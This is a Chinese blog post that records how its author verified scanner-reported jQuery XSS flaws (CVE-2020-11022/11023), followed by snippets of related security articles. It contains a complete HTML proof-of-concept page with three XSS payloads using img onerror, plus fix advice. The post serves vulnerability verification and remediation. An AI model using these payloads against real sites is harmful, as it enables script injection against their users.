Vulnerable Javascript library漏洞记录

最新推荐文章于 2024-10-27 12:37:12 发布
原创 最新推荐文章于 2024-10-27 12:37:12 发布 · 1.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文记录了在安全扫描中发现的Vulnerable Javascript library漏洞,具体为jQuery的XSS漏洞CVE-2020-11022和CVE-2020-11023。通过提供HTML payload,详细解释了如何验证这些漏洞,并给出了两种修复方法:升级到jQuery 3.5.0以上版本或使用XSS清理工具。

AWVS扫出来Vulnerable Javascript library漏洞,然后查询资料,验证漏洞,仅做记录。

参考:

jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)

一开始没看懂怎么操作,后面明白了

payload复制本地保存一份html,然后替换AWVS扫描出来的src,重新网页打开即可验证。

payload:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
    <script src="js地址"></script>
</head>
<body>
<script>
function test(n,jq){
    sanitizedHTML = document.getElementById('poc'+n).innerHTML;
    if(jq){
        $('#div').html(sanitizedHTML);
    }else{
        div.innerHTML=sanitizedHTML;
    }
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>

<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x onerror=alert(1)> 
</xmp>

<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert(1)>">
</xmp>

<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert(1)></style>
</xmp>

<div id="div"></div>
</body>
</html>

本地文件直接替换src

网页打开,验证,漏洞出现。

修复

(1)更新jQuery到3.5.0或更高版本
https://code.jquery.com/jquery-3.5.0.js
(2)使用XSS清理工具清理用户输入的HTML

NLstudy33
关注
复现CVE-2020-11022/11023(jQuery XSS漏洞
记录并分享学习安全的知识点..
05-31 7502
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。 二、影响版本 大于或等于1.2且在3.5.0之前的jQuery版本中 三、漏洞复现 poc如下: <!DOCTYPE html> <html> <head> &lt...
常见网站安全漏洞处理
liudao1991的专栏
08-10 1万+
1. Sql盲注 解决方法:添加过滤 2. Sql注入 解决方法:修改底层代码消除参数化查询 3. iis文件与目录枚举/Directory listing 解决方法:禁止目录浏览 4. webdav目录遍历 解决方法:http://www.45it.com/net/201208/31779.htm 5. _VIEWSTATE未加密 解决...
漏洞总结
Libra_Ng
03-06 2591
会话固定攻击(Session Fixation) ⚡️会话固定攻击(session fixation attack)是利用应用系统在服务器的会话ID固定不变机制,借助他人用相同的会话ID获取认证和授权,然后利用该会话ID劫持他人的会话以成功冒充他人,造成会话固定攻击。 整个攻击流程: 攻击者Attacker能正常访问该应用网站。 应用网站服务器返回一个会话ID给他。 攻击者Atta...
Vulnerable Javascript library
笑到世界都狼狈的博客
06-25 1万+
首先说明一下,这个问题的由来:源于我们开发的项目送去上海检测,结果送检没通过,被打回来了,返回的结果有这么一条:Vulnerable Javascript library 然后字面翻译就是"脆弱的js",对于小白的我来说,从来没遇到过这个问题,然后就赶紧百度,百度返回的结果是---------js插件库版本太低,升级就好了。 那么问题来了,项目中用到那么多插件,总不至于让我把所有的插件都升级一遍吧,这样可能会死人的。。。。。 接下来:我们部门做底层开发的同事安装了一下叫"nessus"的工具,帮我扫描
77% 的网站使用了至少有 1 个漏洞JavaScript
weixin_34088838的博客
04-05 1097
本文作者: Tim Kadlec 编译:胡子大哈 翻译原文:http://huziketang.com/blog/posts/detail?postId=58df725ba58c240ae35bb8dc 英文连接:77% of sites use at least one vulnerable JavaScript library...
is-website-vulnerable:在网站的前端JavaScript库中查找公开的安全漏洞
02-04
网站易受攻击 在网站的前端JavaScript库中发现公开的安全漏洞 非常感谢 用于支持开源安全性 关于 在网站的前端JavaScript库中查找公开的安全漏洞。 用法 命令行 使用Node.js的npx对网站进行一次性扫描: npx is-website-vulnerable https://example.com [--json] [--js-lib] [--mobile | --desktop] [--chromePath] [--cookie] [--token] CLI会提示您输入要输入的URL,从而妥善处理缺少要扫描的URL的情况: $ npx is-website-vul
常见web漏洞(awvs、nessus)验证方法小记-中危漏洞
weixin_43875708的博客
03-12 1万+
1.【中危】不安全Javascript库(Vulnerable Javascript library漏洞描述 SWFObject库 SWFObject是一个免费的开放源代码工具,用于在网站中嵌入swf内容,SWFObject在Internet Explorer中进行动态嵌入的方法,以使用更友好的W3C方式创建。网站正在使用易受攻击的Javascript库,此版本的Javascript库报告了...
BurpZAP插件新扩展:识别易受攻击的JavaScript
[WARNING] jquery.js contains a vulnerable JavaScript library. [INFO] Path: C:\Code\myproject\src\main\webapp\js\jquery.js ``` 这表明在`jquery.js`文件中发现了含有安全漏洞JavaScript库,并指出了该文件...
最新:Lodash 严重安全漏洞背后你不得不知道的 JavaScript 知识
bdfcfff77fa的博客
01-23 2483
通过分析 lodash 的漏洞,以及解决方案,我们了解了原型污染的方方面面。Object 原型原型、原型链NodeJS 相关问题Object.create 方法Object.freeze 方法Map 数据结构深拷贝以及其他问题这么来看,全是基础知识。也正是基础,构成了前端知识体系的方方面面。
数万网站仍在使用有已知漏洞的老旧 JavaScript
weixin_33691700的博客
06-02 1004
美国东北大学研究人员在对超过 133000 个网站分析时发现,有超过 37% 的站点仍在使用至少包含一个已知公开漏洞JavaScript 库。研究人员早在 2014年进行研究时就曾提醒,应当注意由于在浏览器中加载老旧版本的 JavaScript 库(如 jQuery、AngularJS 框架)而导致的潜在安全风险。 正如他们在一篇新发表的论文...
retire.js:扫描程序检测已知漏洞JavaScript库的使用
01-30
Retire.js 您所需要的还必须退休 在Web上以及在那里的Node.JS应用程序中都有大量JavaScript库。 这极大地简化了开发,但是我们需要保持最新的安全修补程序。 现在,“使用具有已知漏洞的组件”已成为安全风险列表的一部分,不安全的库可能给您的Web应用带来巨大的风险。 Retire.js的目标是帮助您检测具有已知漏洞的JS库版本的使用。 Retire.js可以通过多种方式使用: 命令行扫描仪 扫描Web应用程序或节点应用程序以使用易受攻击JavaScript库和/或Node.JS模块。 在应用程序文件夹的源代码文件夹中运行: $ npm install -g retire $ retire Grunt插件 在应用程序的构建例程或某些其他自动化工作流程中 。 Gulp任务 一个Gulp任务的示例,可以在gulpfile中使用它来自动监视和扫描项目文件。 您可以根据需要修改监视模式和(可选)Retire.js选项。 const c = require ( 'ansi-colors' ) ; var gulp = require ( 'gulp' ) ; var be
jQuery版本低引起的漏洞——CVE-2020-11022/CVE-2020-11023
热门推荐
Tracts的博客
03-10 2万+
jQuery版本低引起的漏洞——CVE-2020-11022/CVE-2020-11023 漏洞号:CVE-2020-11022/CVE-2020-11023 影响范围:jQuery >= 1.0.3 < 3.5.0 漏洞原理 见:jQuery最新xss漏洞分析——CVE-2020-11022/11023 - 云+社区 - 腾讯云 (tencent.com) 漏洞复现 https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html 要想在项目本地实
记录一个等保二的项目的漏洞处理
Admans的专栏
07-07 2692
Clickjacking是一种恶意技术,它诱骗 Web 用户点击与用户认为他们正在点击的内容不同的东西,从而可能泄露机密信息或控制他们的计算机,同时 点击看似无害的网页。此外,当用于保护传入或传出网站的敏感信息时,TLS 1.0 不被视为 PCI 数据安全标准 3.2(.1) 定义和要求的“强加密”。Visual Studio 使用此标头的值来确定正在使用的 ASP.NET 版本。找到网站根目录下的Web.config文件,用记事本打开,将 debug 属性更改为 false 以禁用该应用程序的调试。
安全生产:CVE-2020-11022/CVE-2020-11023漏洞解析
IT全栈 华强工作室
09-07 7026
代码安全扫描阶段,前端资源审计发现jQuery版本过低导致生产系统存在类风险。该类风险为应用安全缺陷类DXSS攻击,攻击者可以利用该漏洞注入恶意脚本代码,并在受害者的浏览器上执行。将导致受害者的个人信息泄露、账户被劫持、会话被劫持等安全问题。科运中心给出的解决方案是升级jQuery版本至3.5.0或更高版本。
【CVE-2020-11023】——漏洞复现、原理分析以及漏洞修复
最新发布
IronmanJay
10-27 1万+
在jQuery版本1.0.3到3.5.0之间(包括1.0.3,但不包括3.5.0),将包含``元素的HTML(即使已进行消毒处理)从不受信任的来源传递给jQuery的某些DOM操作方法(如`.html()`、`.append()`等)可能会导致执行不受信任的代码。该问题在jQuery 3.5.0中已得到修复。
记一次网安安全漏洞整改
weixin_30826095的博客
09-29 1746
这里网安使用的扫描软件是Acunetix,总共扫描出1个中等漏洞,2个低等漏洞,3个提示。 1.Medium,Vulnerable Javascript library易受攻击的javascript库 解决,升级到最新版本即可。 2.Low, OPTIONS method is enabled 允许options类型请求方式 解决方法:禁用不...
html创建scrpts方法,web安全扫描问题(常见的)分析以及解决方式
weixin_39745269的博客
06-16 421
这是我上午扫描的一个网站很多地方地方不懂 在网上查了严重问题有Session fixtion,vulnerable javascript library..1.什么是sessionfixation攻击Session fixation有人翻译成“Session完成攻击”,实际上fixation是确知和确定的意思,在此是指Web服务的会话ID是确知不变的,攻击者为受害着确定一个会话ID从而达到攻击...
Jquery XSS漏洞(CVE-2020-11023)
jammny
02-04 8008
漏洞详情 针对CVE-2020-11022漏洞,jQuery Team进行了修复。修复手段为将$.htmlPrefilter()方法替换为标识函数,因此传递的HTML字符串现在不再经过htmlPrefilter函数处理。但是这个修复方法仍有一些手段可以绕过,CVE-2020-11023就是针对CVE-2020-11022的绕过。 漏洞影响 V 1.2.0 <= jquery < V 3.5.0 漏洞详情 绕过使用的是另一个特性,某些特殊的标签在经过html()方法处理时,会由于HTML
vulnerable javascript libraries
04-07
“易受攻击的JavaScript库”。这是指在应用程序中使用的JavaScript库存在安全漏洞,这些漏洞可以被攻击者利用来攻击该应用程序。这些漏洞可能包括SQL注入、跨站点请求伪造(CSRF)等问题。因此,开发者需要定期更新、维护和修复这些库,以最大程度地保证应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值